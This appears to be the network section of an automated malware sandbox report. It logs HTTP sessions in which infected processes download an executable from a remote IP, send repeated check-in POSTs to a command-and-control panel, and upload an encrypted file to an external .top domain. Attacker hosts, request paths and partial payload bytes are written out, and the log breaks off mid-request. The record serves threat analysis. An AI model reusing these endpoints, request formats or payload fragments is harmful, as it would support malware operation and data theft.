                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            28192.168.2.450013185.215.113.16807920C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:19.038916111 CET80OUTGET /mine/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.379973888 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:20 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                            Content-Length: 1889792
                                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 21 Nov 2024 10:54:11 GMT
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            ETag: "673f1153-1cd600"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVfJ@K@WkHJ<J @.rsrcH@.idata @ `*@zbdrpywl1@dwhjapccJ@.taggant0J"@
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.379992008 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.380001068 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.380094051 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.380104065 CET1236INData Raw: ff cd 1e 16 b0 7b 4f e0 50 ae 32 12 f4 b2 b0 7c a1 5a 97 d1 29 08 5e 84 c2 28 ba 36 bf 8c ae 61 63 d0 41 8b 60 90 2a 56 bc 97 12 54 40 a9 21 7a 10 98 6e 96 0c b6 dd 00 62 99 9e e5 b9 fb ae 80 40 0c 03 45 d8 57 d3 81 b2 db ac 53 80 99 e6 47 b1 37
                                                                                                                                                                                                                                                                                                            Data Ascii: {OP2|Z)^(6acA`*VT@!znb@EWSG7EAeHd9{Nw%`x2cl2@dC(@X<wU_]dxN=V`/=`% Om<C)[52a
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.380117893 CET1236INData Raw: 4f cc 84 c6 8f e4 de 13 a8 f0 72 97 e7 67 34 9b 20 ca aa a9 b1 0b 53 1e 31 c5 ae a1 44 10 4e 56 30 aa 06 4e 82 70 b7 0c 43 ee 5a 49 19 8c ce 25 94 2b 2f 41 ba db b3 52 98 8a 2d 09 bf f8 32 62 60 cc b8 45 a0 20 69 74 e4 df af ad 90 4f 93 35 36 29
                                                                                                                                                                                                                                                                                                            Data Ascii: Org4 S1DNV0NpCZI%+/AR-2b`E itO56)-xBg#R /6kg7RDQ$3vnmyZNZR{hv~HnSzXv/VK'HJabx4B[Q"^
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.380137920 CET776INData Raw: cc a3 55 ba 78 a1 52 20 7c 97 d7 d7 b1 a9 76 83 e7 3f 41 76 2b 1c 7c a6 1f b2 85 a2 68 9a 76 5b 8d 49 60 67 7c af a1 34 68 f9 b2 22 5f 34 9c 13 4e 20 55 c3 37 8f 34 47 71 70 43 54 dd 7c 01 c2 37 b1 18 ef 31 34 93 21 97 2d 17 24 78 bd 59 20 ec ec
                                                                                                                                                                                                                                                                                                            Data Ascii: UxR |v?Av+|hv[I`g|4h"_4N U74GqpCT|714!-$xY 3$x[Xuw4y-%pF~sx~ `OX$WBNi__xgP|:TF]SzyPRNxs5:hDf~PnSvY'>}&Xc
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.380148888 CET1236INData Raw: 1e e7 2f e2 5e cd 2b 18 78 39 9a ec 0c ea 0c 19 df 57 93 41 49 8b 1b 71 93 9e c9 c8 ea 26 8f 94 8e 8a 03 58 1d ac 05 46 94 92 81 a8 e5 e8 03 7c 56 cf 0a 76 41 a7 9e 13 2c b3 fb 1b 05 e0 72 2c 9c b5 98 53 da a7 b1 7c a7 9d d5 91 6f 25 57 b6 9a 9b
                                                                                                                                                                                                                                                                                                            Data Ascii: /^+x9WAIq&XF|VvA,r,S|o%WVJ]l2WC%^dD`zohw>&Tc`C_Q)F|g\d$&4,gdki5%zvV)fU&N]1!"~H9
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.380209923 CET1236INData Raw: e3 ad f0 31 14 0b 0f 9f d3 e6 b6 55 43 2d 1b 45 57 7a e7 bf cc 70 eb f5 94 be f4 7b 19 ba 9d cc a9 03 eb 23 f0 18 cb 75 13 0b 5a 11 b5 cb ad 1b b7 18 d8 86 a6 3c d7 56 a0 aa 9d 19 69 b9 f7 09 6a a9 14 ce b0 e0 82 d2 3e 92 d0 d5 58 40 70 9b 46 50
                                                                                                                                                                                                                                                                                                            Data Ascii: 1UC-EWzp{#uZ<Vij>X@pFPZ!R4FW*_(+"7nb`jn#S19Dd_ZO_*M 53+*,jcTy[*K:4XU"uBu<[/Xb2gq#
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.380218983 CET1236INData Raw: 72 14 17 36 54 b0 bf 5f a0 b5 93 dc ca fc 66 36 af 72 66 55 de 94 dc e9 ba 29 e9 78 a5 4f 05 bb 77 8e 80 83 95 90 0d 3a 78 66 93 79 14 0e a5 1c 38 1c e7 d1 d4 a4 19 5b 8a d7 a4 e6 0a 3e 53 62 e0 11 d7 4f d4 ba ed eb 94 11 b5 69 c2 ab 25 3a 5b d9
                                                                                                                                                                                                                                                                                                            Data Ascii: r6T_f6rfU)xOw:xfy8[>SbOi%:[l4Q@sWq,WN\bzrKs%vYJ2SYjRsg|'o6R<L= LQ,=^e5b1wY3Q<Zf
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.501748085 CET1236INData Raw: 64 48 79 cc 4a 50 37 f3 4f c2 70 15 cf 59 16 d6 18 dd 72 10 00 72 90 db 50 68 93 de 79 17 b9 f2 9f af 70 18 03 dd 79 e2 58 10 dc 62 75 0b 26 4e 76 6e 9f 1c 1a e4 c3 1a 26 fe 8d 12 e7 9c 16 6f 7c c3 90 db 03 a1 1b 53 91 e5 20 70 22 53 90 dc 97 10
                                                                                                                                                                                                                                                                                                            Data Ascii: dHyJP7OpYrrPhypyXbu&Nvn&o|S p"SK"#dOdxh/lGeC>qxJc2"|DLnH~{^]zW|fx}{<,%XxSx"?@hid


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            29192.168.2.450021185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.858418941 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:22.249820948 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:22 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            30192.168.2.45002934.116.198.130807256C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:23.528909922 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: fvtekk5pn.top
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Content-Length: 29758
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------rlvqMfj809HUgJEgKMJ9RJ
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 72 6c 76 71 4d 66 6a 38 30 39 48 55 67 4a 45 67 4b 4d 4a 39 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 54 69 66 75 76 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a b7 91 85 19 69 94 67 30 88 c0 8d 65 7c 56 d4 50 a9 8e a8 5c cb 55 c5 98 0f 88 ff 62 57 17 74 a8 58 2b 78 78 6b 61 1a f8 68 be 93 a3 a1 88 4c ff ab 82 09 dc 83 e9 d3 d4 12 bf 45 0f ec 7f 1f 4e 6b f1 95 cd e7 44 4c 33 41 29 9f e1 af 27 f1 63 4b 5d e4 d1 e8 6f e6 c7 7f dc d5 94 51 07 ba b4 a8 3e e0 28 e3 09 56 9d c0 e1 20 f0 19 cf 65 4a a7 ff 41 4f f6 9c 24 48 6e 3c 9b 15 8f 65 7d 62 1a f7 9f 70 d8 7e 3d 05 55 97 e1 02 1b dd ee 83 b6 ab 53 df ee 6e 1c a3 b3 25 a1 dd ab 0a a1 31 aa d6 42 d1 06 4d da 0c b7 e7 a5 12 28 04 18 8f ac d3 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: --------------------------rlvqMfj809HUgJEgKMJ9RJContent-Disposition: form-data; name="file"; filename="Tifuvu.bin"Content-Type: application/octet-streamig0e|VP\UbWtX+xxkahLENkDL3A)'cK]oQ>(V eJAO$Hn<e}bp~=USn%1BM(ByQ7G?)-Jt.a)Lvhb^tNfi2>38+!8N0/~v3c;=ds%"nxa'q2bBPoh|5_nYgVV<+O4tY8.1C#nDC$;MQ3@RFp)Jn3i#DS^^@2`u:pK0A?b74W@yG3*%@znq23~)cYXE&/2l4"XT#RyzyHt*vT>tHOJAN!$7.tw}<$ay?-y_P$K2LyV}acTxq*gb,XiqeT("vg%3Hs.~N<FCIaK$+rp[Kh;Q*d0jd!>SGcv2.\]GM``M[bG;1uP`)?5g#|E fs0uTbuv'M [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:23.648524046 CET4944OUTData Raw: 12 90 ec 82 2d 0f 84 42 dd 89 cc 5b 33 e0 61 11 dd 77 fc 2d 38 85 f6 23 ca 02 60 3b fd 46 c4 97 45 ab c3 ec ed 1d 3e 9b dd bc 47 1f c2 69 ec a0 18 b9 0f 25 56 45 83 7f 99 fb 5a 82 6d bc b5 8e 63 4e 66 51 d3 f0 10 fb 63 2d 7f 72 d2 29 72 7e 3c 64
                                                                                                                                                                                                                                                                                                            Data Ascii: -B[3aw-8#`;FE>Gi%VEZmcNfQc-r)r~<dI,F>.>fEJC>N+$e!JUMXtL0kVBwA4_'pcu++Zh,xY=zQwJF0Li[HU?:V^#
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:23.648627043 CET4944OUTData Raw: 8f 62 28 64 50 9f 0b 8e 4c ff 24 b9 e0 26 07 46 cf 3f 89 f1 42 27 a6 24 db 41 e9 fd c0 26 2e 6a 3a 48 c0 21 62 bf d8 11 df f3 2a 05 a3 10 fb e5 6e 5b 1c 46 df 97 f2 7f 65 03 2c 34 24 9a 04 2a 25 10 b8 02 d1 c5 6a 8a be a2 99 01 ee 1c 48 16 78 0b
                                                                                                                                                                                                                                                                                                            Data Ascii: b(dPL$&F?B'$A&.j:H!b*n[Fe,4$*%jHx-:Z)MP1QTHAj6:`4%$2uts&^smkc74(Zm!sa;.+cLcz#3LTT{-;Sr'|c-CPC#WJ=l
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:23.648824930 CET2472OUTData Raw: 5a 12 d4 22 2e 50 28 41 18 ee ff da e7 eb 72 a3 e2 71 a5 24 0d e5 eb 41 86 00 51 a3 74 8f 83 39 86 c9 31 0d e6 ff 9c e3 8c a5 3a cf 7f f0 f4 c9 ac 31 9b 1b 57 52 6a 61 86 f8 07 da 21 57 f4 b1 7b f4 8d 7d 12 16 3f bf 6d f6 b0 4d 01 76 3d 8a 8f d7
                                                                                                                                                                                                                                                                                                            Data Ascii: Z".P(Arq$AQt91:1WRja!W{}?mMv=h#jt3e$>iIZvJ5Q0g[g9',:T7ud-Cr]96]]EU3`qKv0;9D_[(?r^Y;$
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:23.648968935 CET5219OUTData Raw: a5 e8 05 38 21 e2 58 7c 46 05 ec 6f a6 02 37 94 42 6e f6 12 3b 61 c1 94 af 8c ec f9 25 27 37 5f 50 a5 a5 85 8f d5 6f ab f9 c9 8c c1 98 bf 4d 1f 58 3c 68 9a 82 47 5e 67 29 c5 2f 78 66 b8 00 63 e1 f1 de 7b 54 90 d8 84 3b c7 aa d1 24 af f3 57 5f 4b
                                                                                                                                                                                                                                                                                                            Data Ascii: 8!X|Fo7Bn;a%'7_PoMX<hG^g)/xfc{T;$W_KYXN}eue9`sY1(\@0w'gWh\WO|vFvB$/U',*rSq)b_?y=Cc4B"WgHUf1W(*0x}bC
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:25.238620996 CET190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            date: Thu, 21 Nov 2024 11:11:25 GMT
                                                                                                                                                                                                                                                                                                            content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                                                                                                                            etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                                                                            Data Raw: 4f 4b
                                                                                                                                                                                                                                                                                                            Data Ascii: OK


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            31192.168.2.450030185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:24.001375914 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:25.342087030 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:25 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            32192.168.2.450032185.215.113.206807920C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:24.297112942 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 272
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: ------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FIJDGIJJKEGIEBGCGDHC--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:26.173088074 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:25 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            33192.168.2.450038185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:27.176256895 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:28.585469007 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:28 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            34192.168.2.450055185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:30.348805904 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:31.736730099 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:31 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            35192.168.2.450061185.215.113.206808040C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:31.919364929 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:33.664280891 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:33 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:33.722352028 CET412OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAK
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 210
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
